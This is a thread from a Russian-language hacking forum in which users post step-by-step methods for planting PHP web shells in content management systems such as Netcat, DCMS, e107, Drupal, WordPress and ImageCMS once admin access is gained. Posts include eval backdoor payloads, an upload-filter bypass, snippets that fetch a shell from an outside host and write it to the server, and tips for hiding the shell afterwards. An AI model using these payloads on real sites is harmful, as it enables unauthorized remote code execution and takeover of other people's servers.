Старый 26.02.2012, 00:07   #31
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию PHP Classifieds 7.0

PHP Classifieds 7.0
через темплейты

http://site/admin/html_edit.php
например в index.tpl
Код:
{php}
{/php}
вставляем пхп код, без <? ?>
faza02 вне форума   Ответить с цитированием
Старый 19.03.2012, 19:57   #32
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию Netcat 4.2 CMS

Админка находится по адресу site.com/netcat/admin/
Далее переходим по ссылке site.com/netcat/admin/template/
Выбираем стандартный макет, и в поле "Шаблоны вывода навигации:" вписываем
PHP код:
;
eval(
$_REQUEST[e]);
echo 
http://site.ru/?e=phpinfo();

Опробовано на Netcat 4.2 Extra
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 02.05.2012, 14:02   #33
cat1vo
 
Аватар для cat1vo
 
Регистрация: 08.10.2010
Сообщений: 38
Репутация: 5
По умолчанию

Вот для 4-ой версии вариант.
Код:
 DCMS v4
Уязвимость: заливка web shell'a в обменник (доступна только с формы отправки файла для компа).
Уязвимость заключается в отсутствии проверки имени загружаемого файла, точнее проверяется только одна его часть.

$upfile = $_FILES['file']['name']; //Загружаемый файл
$file=explode('file=', $upfile); //имя запихивается в массив
$rashs=explode('.',"$file[0]"); //В массив запихиваются все элементы имени разделённые точкой
$rashs_l=count($rashs); //Считается кол-во элементов массива
$rashs_l=$rashs_l-1; //Уберается пустое значение (индексируемый массив нумеруется с 0, а count() выдаст 2)
$rashs=$rashs[$rashs_l]; //В переменную запихивается запись стоящая после ПОСЛЕДНЕЙ точки в имени
$dir_info=file("../SYSTEM/data/obmennik/$_POST[dir]/ras.dat"); //Читается файл с доступными расширениями и дальше идёт "проверка"
if (!eregi($rashs,$dir_info[0]))
{
echo "<span style="color:$color[msg]"><b>Неверный тип файла</b></span><br/>";
echo "<a href="add.php">Попробовать еще раз</a><br />";
echo "<a href="index.php">В галлерею</a><br />";
echo "<a href="../index.php">&lt;&lt; На главную</a>";
foot();
}

Атака: флудим на сайте до набора достаточного кол-ва баллов. Берём шелл (мениатюрный менеджер сайта), периименовываем скажем в shell.php.rar, идем в обменник, загружаем в соответствующий раздел, смотрим путь к файлу (если в настройки скрипта не вносилось изменений, это http://site.ru/SYSTEM/data/obmennik/wmobile/shell.php.rar)
Источник
cat1vo вне форума   Ответить с цитированием
Старый 01.06.2012, 00:36   #34
xCedz
 
Регистрация: 05.07.2010
Сообщений: 33
Репутация: 6
По умолчанию

Typo3

Устанавливаем модуль:
http://typo3.org/extensions/repository/view/phpshell

Выполняем команды
xCedz вне форума   Ответить с цитированием
Старый 02.07.2012, 12:37   #35
c0ncat
 
Регистрация: 29.05.2012
Сообщений: 9
Репутация: -1
По умолчанию

Заливка шелла в PHPProBID

1. Содержание сайта => Редактировать адреса электронной почты системы
2. Выбираем любой файл из предложенных
3. Вставляем код php шелла

Шелл находится тут: /language/*****/mails/имяфайла.php

(c) c0ncat
c0ncat вне форума   Ответить с цитированием
Старый 08.07.2012, 23:48   #36
total90
 
Регистрация: 05.07.2010
Сообщений: 5
Репутация: 1
Post

LifeType/pLog
1. Идём /admin.php?op=editSiteSettings&show=upload
2. Убираем из поля upload_forbidden_files нужное нам расширение. При необходимости включаем возможность заливки файлов.
3. Идём /admin.php?op=newResource
4. Льем шелл
5. Получаем шелл по адресу [host]/[path]/gallery/1/1-[resource-id].php (для старых версий(pLog)) или [host]/[path]/gallery/1/[shellname] (для новых версий(LifeType))

Последний раз редактировалось total90; 08.07.2012 в 23:50..
total90 вне форума   Ответить с цитированием
Старый 11.07.2012, 16:02   #37
total90
 
Регистрация: 05.07.2010
Сообщений: 5
Репутация: 1
По умолчанию

e107
Странно, способ вроде тривиальный, но когда надо было - не нашел.
1. Архивируем шелл в ZIP(именно архивируем, не переименовываем!)
2. Идём /e107_admin/plugin.php
3. Льём наш архив
4. Получаем шелл по адресу /e107_plugins/shell.php


Ещё один способ от меня(на одном сайте сработал, на другом - нет, подозреваю что зависит от версии):
1. Идём /e107_admin/prefs.php
2. Справа выбираем вкладку Text Rendering
3. Activate use of [php] bbcode: - выбираем Admin (этого комбобокса я и не увидел на другом сайте)
4. Идём /e107_admin/download.php
5. Добавляем загрузку, в Description пишем:
Код:
[*PHP] $text = file_get_contents('http://site.com/shell.txt');
file_put_contents('shell.php', $text); [/*PHP]
без звёздочек
P.S. eval(), assert() - недоступны(Access denied)
6. Переходим на страницу загрузки(чтобы скрипт отработал)
7. Получаем шелл по адресу [host]/[path]/shell.php

Последний раз редактировалось total90; 11.07.2012 в 21:43..
total90 вне форума   Ответить с цитированием
Старый 13.08.2012, 06:30   #38
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от Svet Посмотреть сообщение
Drupal 6
нужны права админа или околоадмина (то есть роль пользователя должна иметь возможность использовать вставки php-кода в контент)

http://site/admin/settings/filters/3 - тут смотреть настройки php input format
http://site/admin/user/roles - тут описание ролей и права
http://site/admin/user/user - список пользователей и их данные

В дампе БД смотреть таблицы:
users - данные пользователей.
user_roles - роли пользователей (не описание ролей, а именно у кого какие роли)
role, rules_rules - описания ролей

Заливки:
http://site/admin/build/block
Создаем новый блок.
В Input format выбираем php.
В Block body вводим код шелла (например, <?php @eval($_GET['e']); ?>).
Сохраняем. Теперь надо привязать блок к какому-то региону. Привязываем. Сохраняем. Профит.
Теперь на любой странице, где используется этот регион, можно будет использовать шелл (где какой регион используется, можно определить по их названиям).

http://site/node/add
Тут во многих разделах можно создавать файлы с PHP-кодом. Посмотрим на примере page:
http://site/node/add/page
Создаем новую страницу.
В Input format выбираем php.
В Body вводим код шелла.
В XML sitemap в Priority ставим Not in sitemap.
В Menu settings в Parent item ставим какую-нибудь отключенную ветку.
В URL path settings снимаем галочку с Automatic alias и в поле ввода пишем какой-нибудь замысловатый относительный(!) url.
Сохраняем. Готово.
Drupal 7

Цитата:
Переходим в site/admin/modules и в Стандартных ищем Php filter. Активируем его.
vp$ вне форума   Ответить с цитированием
Старый 15.08.2012, 11:18   #39
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

WordPress 3.4.1.
1) Шелл загружаем как плагин
2) Библиотека файлов видим наш файл, жмем "изменить" и видим "Ссылка на файл"
Есесно как зайдем на шелл не забываем переименовать и удалить из админки запись о файле.

Дополнение:
Бывет что папка wp-content/ без прав на запись (одмин наркоман) в таком случае идем в Опции медиафайлов (wp-admin/options-media.php) и изменяем пути загрузки:
К примеру: /home/ololoshkin/public_html/
Важно убрать галочку с "Organize my uploads into month- and year-based folders" по русски это "Помещать загруженные мной файлы в папки по месяцу и году"
И заливаемся в корень сайта. Пути можно казывать как полные так и относительные.

Последний раз редактировалось b3; 15.08.2012 в 11:59..
b3 вне форума   Ответить с цитированием
Старый 19.08.2012, 17:41   #40
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

_http://www.imagecms.net/

Заходим в си-ма -> конфигурация сайта
Смотрим какой шаблон используется
Идем в модули -> Все модули -> Редактор шаблонов -> Выбираем нужный шаблон

Создаем файл, например:

shell.php
PHP код:
{#phpinfo()}

{copy('http://[host]/future_shell.php''[path]/shell.php')} 
Все функции или переменные располагаются между разделителями { и }

"#" комментарий в {#phpinfo()}, аналогично есть "//", "/**/"

Нужно помнить, так как это демонстрационный пример,

в примере copy() зависит от:
- оберки URL;
- safe_mode=off;

Создаем содержимое, в "Параметрах" указываем:
"Url": shell
"Шаблон Страницы": shell.php

На вкладке "Содержание" задаем любое "Предварительное содержание", "Заголовок"

Вызываем http://[host]/shell, перед этим чистя кеш: Система -> Кеш -> Очистить полностью

Шелл лучше лить туда откуда файлы напрямую отдаются.

На прямую отдаётся с этих каталогов:
application/modules/.*/templates
templates

Зависит еще от ветки движка.
Все каталоги смотреть в в .htaccess.

Чтоб узнать путь использовать "Волшебные" константы (__FILE__ etc).

В остальных случаях все запросы принимает Front Controller (index.php).

Последний раз редактировалось }{оттабыч; 19.08.2012 в 18:50..
}{оттабыч вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot